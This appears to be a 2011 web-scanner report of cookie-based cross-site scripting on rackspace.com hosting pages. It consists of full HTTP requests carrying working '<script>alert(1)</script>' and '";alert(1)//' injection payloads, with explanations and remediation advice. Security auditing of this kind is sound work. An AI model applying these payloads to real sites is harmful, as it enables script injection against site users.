GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84c77e"%3balert(1)//a445432c1d7; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e67e"%3balert(1)//6221dc83b7f was submitted in the chatslider cookie. This input was echoed as 3e67e";alert(1)//6221dc83b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3e67e"%3balert(1)//6221dc83b7f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee7a"><script>alert(1)</script>000fbc348eb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3ee7a"><script>alert(1)</script>000fbc348eb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22cc"><script>alert(1)</script>770593c3da5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c22cc"><script>alert(1)</script>770593c3da5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8826"%3balert(1)//f82e40c950a was submitted in the IS_UASrackuid cookie. This input was echoed as c8826";alert(1)//f82e40c950a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c8826"%3balert(1)//f82e40c950a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab573"%3balert(1)//25e526adf65 was submitted in the chatslider cookie. This input was echoed as ab573";alert(1)//25e526adf65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dab573"%3balert(1)//25e526adf65; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e899a"><script>alert(1)</script>03f8f1f368 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De899a"><script>alert(1)</script>03f8f1f368; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a67"><script>alert(1)</script>b6f54d93f29 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f825a67"><script>alert(1)</script>b6f54d93f29; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1754c"%3balert(1)//d5a8556ffcb was submitted in the IS_UASrackuid cookie. This input was echoed as 1754c";alert(1)//d5a8556ffcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81754c"%3balert(1)//d5a8556ffcb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 48752
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37330"><script>alert(1)</script>7ee8dff4075 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D37330"><script>alert(1)</script>7ee8dff4075; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2172"%3balert(1)//30e27f0efc8 was submitted in the chatslider cookie. This input was echoed as c2172";alert(1)//30e27f0efc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/disasterrecovery.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc2172"%3balert(1)//30e27f0efc8; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a6b"><script>alert(1)</script>4c3182f828b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5a6b"><script>alert(1)</script>4c3182f828b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f363"%3balert(1)//61f905e706c was submitted in the IS_UASrackuid cookie. This input was echoed as 2f363";alert(1)//61f905e706c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
